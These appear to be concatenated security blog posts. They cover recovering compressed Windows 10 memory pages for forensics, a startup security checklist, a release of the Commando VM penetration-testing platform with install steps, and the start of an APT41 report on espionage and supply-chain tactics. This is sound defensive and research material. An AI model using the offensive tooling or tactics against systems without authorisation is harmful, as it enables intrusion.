This blog post is the second in a three-part series covering our Windows 10 memory forensics research, and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research into both the Volatility and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered on Windows 10 without the FLARE research integration (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory-constrained virtual machine. A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory-constrained virtual machine (1 GB RAM), the marker page soon becomes stale and is evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) contains a string beginning with “CC WAS HERE!”.
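The ram_eater source is not included in this post. The following is a hypothetical Python analogue of the same idea: map one anonymous page, stamp it with the marker string, report its address, and then allocate further memory in page-sized chunks, touching each page so it is actually committed. In a memory-constrained VM you would keep calling `eat_ram` until the marker page is evicted.

```python
import ctypes
import mmap

PAGE_SIZE = mmap.PAGESIZE
MARKER = b"CC WAS HERE!"

def allocate_marker_page():
    """Map one anonymous page, stamp MARKER at its start, and return (mapping, address)."""
    page = mmap.mmap(-1, PAGE_SIZE)
    page.write(MARKER)
    address = ctypes.addressof(ctypes.c_char.from_buffer(page))
    return page, address

def eat_ram(pages_per_step, steps):
    """Allocate `steps` chunks of `pages_per_step` pages, touching each page so it is committed."""
    chunks = []
    for _ in range(steps):
        chunk = bytearray(pages_per_step * PAGE_SIZE)
        for offset in range(0, len(chunk), PAGE_SIZE):
            chunk[offset] = 0x41  # write one byte per page
        chunks.append(chunk)
    return chunks

if __name__ == "__main__":
    marker, address = allocate_marker_page()
    print(f"marker page at {address:#x}")
    hog = eat_ram(pages_per_step=256, steps=4)  # keep references so the memory stays allocated
```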

Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE), and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page; therefore, they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.
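The PFN arithmetic can be written out explicitly: the PFN selects the physical page, and the low 12 bits of the virtual address give the byte offset inside it. The PFN below is a placeholder, not the value shown in Figure 2.

```python
PAGE_SIZE = 0x1000  # 4 KiB pages

def pfn_to_physical(pfn, virtual_address):
    """Physical address of `virtual_address`, given the page frame number from its PTE."""
    return pfn * PAGE_SIZE + (virtual_address & (PAGE_SIZE - 1))

# The marker page address is page aligned, so its data starts at pfn * 0x1000.
# 0x1234 is a placeholder PFN.
print(hex(pfn_to_physical(0x1234, 0x2a368480000)))  # 0x1234000
```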

Figure 2: Locating and viewing the marker page from the kernel debugger

After allocating additional memory using ram_eater, we check whether the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index into nt!MmPagingFile (see Figure 3).

Figure 3: PTE of a compressed page in the virtual store and confirmation of the virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough way to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function references two global variables: the number of active PageFiles and an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm whether the PageFile represents a virtual store.

Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle for locating the page within the store. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note that we do not use the PTE’s swizzle bit in the page key calculation, since the OS build is below 1803. To begin page retrieval, we need to locate the pointer to the Store Manager’s global structure, nt!SmGlobals. This is a straightforward process if symbols are available (see Figure 5).
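The exact calculation lives in the white paper and is not reproduced in this post. As a hedged illustration only: if the key places the PageFile index (PageFileLow, which is 2 in Figure 3) in the top four bits and MMPTE_SOFTWARE.PageFileHigh in the remaining 28 bits, that would be consistent with 0x201a3061, whose top nibble is 2. Treat this layout as an assumption to verify against the white paper; it also ignores the swizzle-bit handling that applies from 1803 onward.

```python
def sm_page_key(page_file_low, page_file_high):
    """ASSUMED pre-1803 layout: PageFileLow in bits 28-31, PageFileHigh in bits 0-27."""
    if not 0 <= page_file_low < 16 or not 0 <= page_file_high < (1 << 28):
        raise ValueError("field out of range for this assumed layout")
    return (page_file_low << 28) | page_file_high

def split_sm_page_key(key):
    """Inverse of sm_page_key under the same assumption: (PageFileLow, PageFileHigh)."""
    return key >> 28, key & 0x0FFFFFFF

print(hex(sm_page_key(2, 0x1a3061)))  # 0x201a3061
```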

Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, or directly at nt!SmGlobals. Viewed as a memory dump, nt!SmGlobals appears as an array of pointers. Viewed as a two-dimensional array (32x32) of SMKM_STORE_METADATA elements, each element in the array of pointers points to an array of 32 SMKM_STORE_METADATA structures. Each SMKM_STORE_METADATA structure represents a store. To locate our SM_PAGE_KEY’s corresponding store, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.

Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure), we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index into the pointer array is the result of dividing the retrieved store index by 32, while the second index is the remainder of that division. In our case, both indices are 0, and they select the first of the 1024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, are placed in stores 1 to 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.
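The index split described above is a single integer division with remainder over the 32 x 32 layout of nt!SmGlobals. A small sketch (the function name is hypothetical):

```python
STORES_PER_ARRAY = 32  # 32 pointers x 32 SMKM_STORE_METADATA entries = 1024 stores

def store_indices(store_index):
    """Split a store index into (index into the pointer array, index within that array)."""
    if not 0 <= store_index < STORES_PER_ARRAY * STORES_PER_ARRAY:
        raise ValueError("store index out of range")
    return divmod(store_index, STORES_PER_ARRAY)

print(store_indices(0))   # (0, 0): the legacy-application store used in this walkthrough
print(store_indices(33))  # (1, 1)
```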

Figure 7: Dumping the SMKM_STORE structure

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.

Figure 8: Traversing the local B+tree to find the chunk key associated with the SM_PAGE_KEY

After the B+tree traversal is complete, we find that our chunk key is 0x4b02d. Since it’s a compound value, we need to decode it in order to retrieve the two indices into SMHP_CHUNK_METADATA’s chunk pointer array and the offset within the located chunk. The decoding involves four additional SMHP_CHUNK_METADATA fields: dwVectorSize, dwPageRecordsPerChunk, dwPageRecordSize, and dwChunkPageHeaderSize. The process is shown in Figure 9.

Figure 9: Retrieving the page record associated with the chunk key

The decoding of the chunk key in Figure 9 allowed us to find all the information to derive the virtual address of our compressed page. The retrieved REGION_KEY (0xf72397, in our case) is also a compound value that encodes the index within the SMKM_STORE’s region pointer array, as well as the offset within the region of pages. To calculate this data, we parse the region key with the help of two fields inside the ST_DATA_MGR structure – dwRegionIndexMask and dwRegionSizeMask. The calculations are shown in Figure 10.

Figure 10: Calculating the compressed page’s virtual address

The virtual address 0x12f3970 calculated in Figure 10 contains the compressed page of interest. We can retrieve it from the MemCompression process space, as shown in Figure 11. To confirm that the compressed memory is located within MemCompression, check the SMKM_STORE structure’s StoreOwnerProcess field.

Figure 11: Retrieving the compressed page from within MemCompression process space

The compressed page can be decompressed with a call to the RtlDecompressBufferEx API or any other implementation that supports the XPRESS compression algorithm.
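A minimal ctypes sketch of that call, assuming a Windows host and a compressed page already copied out of the MemCompression process. RtlDecompressBufferEx and RtlGetCompressionWorkSpaceSize are documented ntdll exports; the one-page output size is an assumption, and the compression format would ideally come from ST_DATA_MGR.wCompressionFormat rather than the XPRESS default used here.

```python
import ctypes
import sys

COMPRESSION_FORMAT_XPRESS = 0x0003  # value from the Windows SDK headers
PAGE_SIZE = 0x1000

def decompress_page(compressed, compression_format=COMPRESSION_FORMAT_XPRESS, out_size=PAGE_SIZE):
    """Decompress one compressed store page via ntdll!RtlDecompressBufferEx (Windows only)."""
    if sys.platform != "win32":
        raise OSError("RtlDecompressBufferEx is only available on Windows")
    ntdll = ctypes.WinDLL("ntdll")

    # Query the scratch space the engine needs; use the larger of the two sizes to be safe.
    buffer_ws, fragment_ws = ctypes.c_ulong(0), ctypes.c_ulong(0)
    status = ntdll.RtlGetCompressionWorkSpaceSize(
        ctypes.c_ushort(compression_format), ctypes.byref(buffer_ws), ctypes.byref(fragment_ws))
    if status < 0:  # NT_SUCCESS(status) means status >= 0
        raise OSError(f"RtlGetCompressionWorkSpaceSize failed: {status & 0xFFFFFFFF:#010x}")
    workspace = ctypes.create_string_buffer(max(buffer_ws.value, fragment_ws.value, 1))

    src = ctypes.create_string_buffer(bytes(compressed), len(compressed))
    dst = ctypes.create_string_buffer(out_size)
    final_size = ctypes.c_ulong(0)
    status = ntdll.RtlDecompressBufferEx(
        ctypes.c_ushort(compression_format), dst, ctypes.c_ulong(out_size),
        src, ctypes.c_ulong(len(compressed)), ctypes.byref(final_size), workspace)
    if status < 0:
        raise OSError(f"RtlDecompressBufferEx failed: {status & 0xFFFFFFFF:#010x}")
    return dst.raw[:final_size.value]
```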


In this blog post, we shared a walkthrough in which we forced a known marker page into the compression store and manually retrieved it by walking through memory dumps using known structure offsets from Windows 10 1703 x64. The same techniques can be applied to Windows 10 1607 and later, assuming the correct structure offsets are known. In Part 3 of the series, Automating Undocumented Structure Extraction, we will look at how the FLARE team leveraged emulation via flare-emu to automate the extraction of the structures used in this walkthrough.


7 Steps to Building a Cybersecurity Strategy from Scratch

When your organization is young and growing, you may find yourself overwhelmed with a never-ending to-do list. It can be easy to overlook security when you’re hiring new employees, finding infrastructure, and adopting policies. Without a proper cybersecurity strategy, however, the business that you’ve put your heart and soul into, or the brilliant idea that you’ve spent years bringing to life, is on the line. Every year, businesses face significant financial, brand, and reputational damage resulting from data breaches, and many small businesses never recover.

Not only that, but as you grow you may be looking to gain investors or strategic partners.  Many of these firms are not willing to give organizations that don’t take security seriously a chance. A strong security stance can be your differentiator among your customers and within the Venture Capital landscape.

One thing’s for sure: you’ve spent a great deal of time creating a business of your own, so why throw it all away by neglecting your security?  You can begin building your own cybersecurity strategy by following these steps:

1.  Start by identifying your greatest business needs.

This understanding is critical when determining how your vulnerabilities could affect your organization.  Possible business needs could include manufacturing, developing software, or gaining new customers. Make a list of your most important business priorities.

2.  Conduct a third-party security assessment to identify and remediate the greatest vulnerabilities to your business needs.

The assessment should evaluate your organization’s overall security posture, as well as the security of your partners and contractors.

Once you understand the greatest risks to your business needs, you can prioritize your efforts and budget based on ways to remediate these.

3.  Engage a Network Specialist to set up a secure network or review your existing network.

A properly designed and configured network can help prevent unwanted users from getting into your environment and is a bare necessity when protecting your sensitive data.

Don’t have a set office space?  If you and your team are working from home or communal office spaces, be sure to never conduct sensitive business on a shared network.

4.  Implement onboarding (and offboarding) policies to combat insider threat, including a third-party vendor risk management assessment.

Your team is your first line of defense, but as you grow, managing the risk of bringing on more employees can be challenging. Whether maliciously attempting to steal data or unknowingly clicking a bad link, employees pose great threats to organizations.

As part of your onboarding policy, be sure to conduct thorough background checks and monitor users’ access privileges.  This goes for your employees, as well as any third parties and contractors you bring on.

5.  Implement a security awareness training program and take steps to make security awareness part of your company culture.

Make sure your training program includes topics such as password best practices, phishing identification and secure travel training.  Keep in mind, though, that company-wide security awareness should be more than once-a-year training.  Instead, focus on fostering a culture of cybersecurity awareness.

6.  Set up multi-factor authentication and anti-phishing measures.

Technology should simplify your security initiatives, not complicate them.  Reduce the number of administrative notifications to only what is necessary and consider improvements that don’t necessarily require memorizing more passwords, such as password managers and multi-factor authentication for access to business-critical data.

7.  Monitor your data and endpoints continuously with a Managed Security Services Provider.

As you grow, so does the number of endpoints you have to manage and the amount of data you have to protect. One of the best ways to ensure this data is protected is to have analysts monitoring it at all hours. A managed security services provider will monitor your data through a 24/7 security operations center, watching for suspicious activity such as phishing emails, malicious sites, and unusual network activity.

You’re not done yet: revisit your security strategy as you evolve.  

It’s important to remember that effective cybersecurity strategies vary among organizations. As you grow, you’ll want to consider performing regular penetration testing and implementing an Incident Response Plan.  

And, as your business changes, you must continually reassess your security strategy and threat landscape.

For more information, get the Comprehensive Guide to Building a Cybersecurity Strategy from Scratch.

The post 7 Steps to Building a Cybersecurity Strategy from Scratch appeared first on GRA Quantum.

Commando VM 2.0: Customization, Containers, and Kali, Oh My!

The Complete Mandiant Offensive Virtual Machine (“Commando VM”) took the penetration testing community by storm when it debuted in early 2019 at Black Hat Asia Arsenal. Our 1.0 release featured more than 140 tools. Now we are back with another release, this time at Black Hat USA Arsenal 2019! In this 2.0 release we’ve listened to the community and implemented some new must-have features: Kali Linux, Docker containers, and package customization.

About Commando VM

Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. We specifically designed Commando VM to be the go-to platform for performing internal penetration tests. The benefits of using Commando VM include native support for Windows and Active Directory, using your VM as a staging area for command and control (C2) frameworks, more easily (and interactively) browsing network shares, and using tools such as PowerView and BloodHound without any worry about placing output files on client assets.

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install software and delivers many tools and utilities to support penetration testing. With over 170 tools and growing, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer.

Recent Updates

Since its initial release at Black Hat Asia Arsenal in March 2019, Commando VM has received three additional updates, including new tools and/or bug fixes. We closed 61 issues on GitHub and added 26 new tools. Version 2.0 brings three major new features, more tools, bug fixes, and much more!

Kali Linux

In 2016 Microsoft released the Windows Subsystem for Linux (WSL). Since then, pentesters have been trying to leverage this capability to squeeze more productivity out of their Windows systems. The fewer virtual machines you need to run, the better. With WSL you can install Linux distributions from the Windows Store and run common Linux commands in a terminal, such as starting up an SSH, MySQL or Apache server, automating mundane tasks with common scripting languages, and using many other Linux applications within the same Windows system.

In January 2018, Offensive Security announced support for Kali Linux in WSL. With our 2.0 release, Commando VM officially supports Kali Linux on WSL. To get the most out of Kali, we've also included VcXsrv, an X Server that allows us to display the entire Linux GUI on the Windows Desktop (Figure 1). Displaying the Linux GUI and passing windows to Windows had been previously documented by Offensive Security and other professionals, and we have combined these to include the GUI as well as shortcuts to take advantage of popular programs such as Terminator (Figure 2) and DirBuster (Figure 3).

Figure 1: Kali XFCE on WSL with VcXsrv

Figure 2: Terminator on Commando VM – Kali WSL with VcXsrv

Figure 3: DirBuster on Commando VM – Kali WSL with VcXsrv

Docker

Docker is becoming increasingly popular within the penetration testing community. Multiple blog posts exist detailing interesting functionality using Docker for pentesting. Based on its popularity Docker has been on our roadmap since the 1.0 release in March 2019, and we now support it with our release of Commando VM 2.0. We pull tools such as Amass and SpiderFoot and provide scripts to launch the containers for each tool. Figure 4 shows an example of SpiderFoot running within Docker.

Figure 4: Impacket container running on Docker

For command-line Docker containers, such as Amass, we created a PowerShell script that automatically runs Amass commands through Docker. This script is also added to the PATH, so users can call amass from anywhere. The script is shown in Figure 5. We encourage users to come up with their own scripts to do more creative things with Docker.

Figure 5: Amass.ps1 script

The same script runs when the Amass shortcut is opened.

Figure 6: Amass Docker container executed via PowerShell script
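
The Amass.ps1 wrapper itself appears only as a figure. To illustrate the same idea, here is a minimal Python sketch that forwards its arguments to a throwaway container. The image name caffix/amass and the helper names are assumptions for illustration, not what Commando VM ships. The --rm, -i and -t options are standard docker run flags.

```python
import shutil
import subprocess

# Assumed image name for illustration; substitute the image your setup pulls.
DEFAULT_IMAGE = "caffix/amass"


def build_docker_command(tool_args, image=DEFAULT_IMAGE):
    """Return the argv list that runs `image` once with `tool_args`.

    --rm deletes the container when it exits, and -it keeps stdin open
    with a terminal attached so interactive output renders normally.
    """
    return ["docker", "run", "--rm", "-it", image, *tool_args]


def run(tool_args, image=DEFAULT_IMAGE):
    """Run the containerized tool and return its exit code."""
    if shutil.which("docker") is None:
        raise FileNotFoundError("docker executable not found on PATH")
    return subprocess.call(build_docker_command(tool_args, image))
```

A thin amass launcher on the PATH could call run(sys.argv[1:]), so that typing amass enum -d example.com runs inside the container. Keeping the command construction separate from execution makes the wrapper easy to reuse for other containerized tools.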

Customization

Not everyone needs all of the tools all of the time. Some tools can extend the installation process by hours, take up many gigabytes of hard drive space, or come with unsuitable licenses and user agreements. On the other hand, you may want to install additional reversing tools available within our popular FLARE VM, or you may prefer one of the many alternative text editors or browsers available from the Chocolatey community feed. Either way, we would like to give you the option to install only the packages you want. Customization also lets you and your organization share or distribute a profile, so that your entire team has the same VM environment. To support these scenarios, the last big change in Commando VM 2.0 is support for installation customization. We recommend starting from our default profile and removing or adding tools as you see fit. Please read the following section to see how.

How to Create a Custom Install

Before we start, please note that after customizing your own edition of Commando VM, the cup all command will only upgrade packages pre-installed within your customized distribution. New packages released by our team in the future will not be installed or upgraded automatically with cup all. When needed, these new packages can always be installed manually using the cinst or choco install command, or by adding them to your profile before a new install.
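
Because cup all only upgrades what your profile installed, it can help to check which packages from a newer package list your profile does not cover. The following is a minimal Python sketch. It assumes the profile stores packages as a list of objects with a "name" key (verify this against your copy of profile.json) and that you have the newer list as plain package names.

```python
import json


def profile_package_names(profile_text):
    """Collect package names from a profile's "packages" section.

    Entries are assumed to be objects with a "name" key; plain strings
    are accepted too, in case a profile uses that simpler form.
    """
    profile = json.loads(profile_text)
    names = set()
    for entry in profile.get("packages", []):
        names.add(entry["name"] if isinstance(entry, dict) else entry)
    return names


def missing_install_commands(profile_text, available_packages):
    """Return a `choco install` command for each package the profile lacks."""
    installed = profile_package_names(profile_text)
    return [f"choco install {name}"
            for name in sorted(set(available_packages) - installed)]
```

The output lists commands you could run manually, or it can serve as a reminder of which names to add to your profile before the next install.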

Simple Instructions

  1. Download the zip from the Commando VM GitHub repository into your Downloads folder.
  2. Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing or adding tools in the “packages” section. Tools are available from our package list or from the Chocolatey repository.
  3. Open an administrative PowerShell window and enable script execution.
    • Set-ExecutionPolicy Unrestricted -f
  4. Change to the unzipped project directory.
    • cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\
  5. Execute the install with the -profile_file argument.
    • .\install.ps1 -profile_file .\profile.json
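
Step 2 can also be scripted, which helps when a team maintains several profiles. The following is a minimal Python sketch that assumes a {"env": {...}, "packages": [{"name": ...}, ...]} layout. The function name is hypothetical, and any package names you pass in are your own.

```python
import json
from pathlib import Path


def customize_profile(path, remove=(), add=()):
    """Drop packages named in `remove`, append those in `add`, save the file.

    Entries are assumed to be objects with a "name" key. Extra keys on
    kept entries (such as installation arguments) are preserved.
    """
    path = Path(path)
    # utf-8-sig tolerates a byte-order mark, which some Windows editors add.
    profile = json.loads(path.read_text(encoding="utf-8-sig"))
    to_remove = set(remove)
    packages = [p for p in profile.get("packages", [])
                if p["name"] not in to_remove]
    present = {p["name"] for p in packages}
    for name in add:
        if name not in present:  # avoid duplicate entries
            packages.append({"name": name})
            present.add(name)
    profile["packages"] = packages
    path.write_text(json.dumps(profile, indent=2), encoding="utf-8")
    return [p["name"] for p in packages]
```

The env dictionary is written back unchanged, so the edited file can be passed to .\install.ps1 -profile_file exactly as in step 5.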

Detailed Instructions

To start customizing your own distribution, you need the following three items* from our public GitHub repository:

  1. Our install.ps1 script
  2. Our sample profile.json
  3. An installation template. We recommend using commandovm.win10.installer.fireeye.

*Note: If you download the project ZIP from GitHub it will contain all three items.

The install script now supports an optional -profile_file argument, which specifies a JSON profile. Without the -profile_file argument, running .\install.ps1 installs the default Commando VM distribution. To customize your edition of Commando VM, create a profile in JSON format and pass it to the -profile_file argument. Let us explore the sample profile.json profile (Figure 7).

Figure 7: profile.json profile

This JSON profile starts with the env dictionary, which specifies environment variables used by the installer. These environment variables can, and should, be left at their default values. Here is a list of the supported environment variables:

  • VM_COMMON_DIR specifies where the shared libraries should be installed on the VM. After a successful install, you will find a FireEyeVM.Common directory within this location. This contains a PowerShell module that is shared by our packages.
  • TOOL_LIST_DIR and TOOL_LIST_SHORTCUT specify which directory contains the list of all installed packages within the Start Menu and the name of the desktop shortcut, respectively.
  • RAW_TOOLS_DIR specifies the location where some tools will be installed. Chocolatey defaults to installing tools in %ProgramData%\Chocolatey\lib. This environment variable points to %SystemDrive%\Tools by default, making some tools easier to access from the command line.
  • And, finally, TEMPLATE_DIR specifies a template package directory relative to where install.ps1 is on disk. We strongly recommend using the commandovm.win10.installer.fireeye package available on our GitHub repository as the template. If your VM is running Windows 7, please switch to the appropriate commandovm.win7.installer.fireeye package. If you are feeling “hacky” and adventurous, feel free to customize the installer further by modifying the chocolateyinstall.ps1 and chocolateyuninstall.ps1 scripts within the tools directory of the template. Note that a proper template will be a folder containing at least 5 things: (1) a properly formatted nuspec file, (2) a “tools” folder that contains (3) a chocolateyinstall.ps1 file, (4) a chocolateyuninstall.ps1 file, and (5) a profile.json file. If you use our template, the only thing you need to change is the packages.json file. The easiest way to get our template is to download and extract the commando-vm zip file from GitHub.
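
The env values use Windows %NAME% syntax. For example, RAW_TOOLS_DIR resolves to C:\Tools on a machine whose system drive is C:. The following minimal Python sketch shows that expansion. It uses an explicit mapping instead of the live environment so the result is predictable, and the function names and example values are illustrative assumptions.

```python
import re

# Matches a %NAME% reference; NAME may not itself contain a percent sign.
_VAR = re.compile(r"%([^%]+)%")


def expand_windows_vars(value, variables):
    """Expand %NAME% references using the `variables` mapping.

    Lookup is case-insensitive, as Windows environment variables are.
    Unknown names are left untouched, as ExpandEnvironmentStrings does.
    """
    lookup = {k.upper(): v for k, v in variables.items()}

    def replace(match):
        return lookup.get(match.group(1).upper(), match.group(0))

    return _VAR.sub(replace, value)


def resolve_env(profile_env, variables):
    """Expand every value in a profile's "env" dictionary."""
    return {key: expand_windows_vars(val, variables)
            for key, val in profile_env.items()}
```

Values without references, such as a TEMPLATE_DIR package name, pass through unchanged.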

With the environment variables set, you can now specify which packages to install in your own distribution. Some packages accept additional installation arguments; for an example, see the openvpn.fireeye entry. For a complete list of packages available from our feed, please see our package list.

Once you finish modifying your profile, you are ready for installation. Run powershell.exe with elevated privileges and execute the following commands to install your own edition of Commando VM, assuming you saved your profile as myprofile.json (Figure 8).

Figure 8: Example myprofile.json

The myprofile.json file can then be shared and distributed throughout your entire organization to ensure everyone has the same VM environment when installing Commando VM.

Conclusion

Commando VM was originally designed to be the de facto Windows machine for every penetration tester and red teamer. Now, with the addition of Kali Linux support, Docker and installation customization, we hope it will be the one machine for all penetration testers and red teamers. For a complete list of tools, and for the installation script, please see the Commando VM GitHub repository. We look forward to addressing user feedback, adding more tools and features, and creating many more enhancements for this Windows attack platform.

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.
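
Identifier matching also hides who the intended targets are. To see why, consider a stage that stores only hashes of the identifiers it looks for. The sketch below is hypothetical. The choice of MAC addresses, SHA-256 and the function names are assumptions for illustration, not details of APT41’s tooling.

```python
import hashlib


def digest_identifier(identifier):
    """Normalize an identifier (assumed here to be a MAC address) and hash it."""
    normalized = identifier.replace("-", ":").lower()
    return hashlib.sha256(normalized.encode("ascii")).hexdigest()


# Hypothetical target list. A real list would ship only the digests; one is
# computed here so the example stays self-contained.
TARGET_DIGESTS = {digest_identifier("00:11:22:33:44:55")}


def is_intended_target(local_identifiers, target_digests=TARGET_DIGESTS):
    """Return True if any local identifier hashes to a listed digest."""
    return any(digest_identifier(i) in target_digests
               for i in local_identifiers)
```

An analyst who recovers such a list sees only digests, not the systems they stand for. Conversely, an analyst with a candidate list of identifiers can hash each one and compare the results, which is one way such target lists get partially recovered.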

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two personas using the monikers “Zhang Xuguang” and “Wolfzhi” that are linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, which is similar to APT41’s operational times against online gaming targets and suggests that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.
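
Comparing activity against an advertised window such as 4:00pm to 6:00am needs some care, because the window wraps past midnight. The following is a minimal Python sketch of that check. It assumes both the advertised hours and the comparison use China Standard Time (UTC+8), and it does not describe how the published analysis was done.

```python
from datetime import datetime, time, timedelta, timezone

# Assumption: advertised hours are local China Standard Time (UTC+8).
CST = timezone(timedelta(hours=8))
WINDOW_START = time(16, 0)  # 4:00pm
WINDOW_END = time(6, 0)     # 6:00am the next day


def in_window(moment, start=WINDOW_START, end=WINDOW_END, tz=CST):
    """True if a timezone-aware datetime falls inside [start, end) in `tz`.

    When start > end the window crosses midnight, so a time qualifies if
    it is at or after the start OR before the end.
    """
    local = moment.astimezone(tz).time()
    if start <= end:
        return start <= local < end
    return local >= start or local < end


def share_in_window(moments):
    """Fraction of timestamps that fall inside the window."""
    moments = list(moments)
    if not moments:
        return 0.0
    return sum(in_window(m) for m in moments) / len(moments)
```

Timestamps must carry a timezone (for example, UTC from logs). Otherwise astimezone treats them as the analysis machine’s local time.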

Attribution to these individuals is backed by identified persona information, their previous work and apparent programming expertise, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.

Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

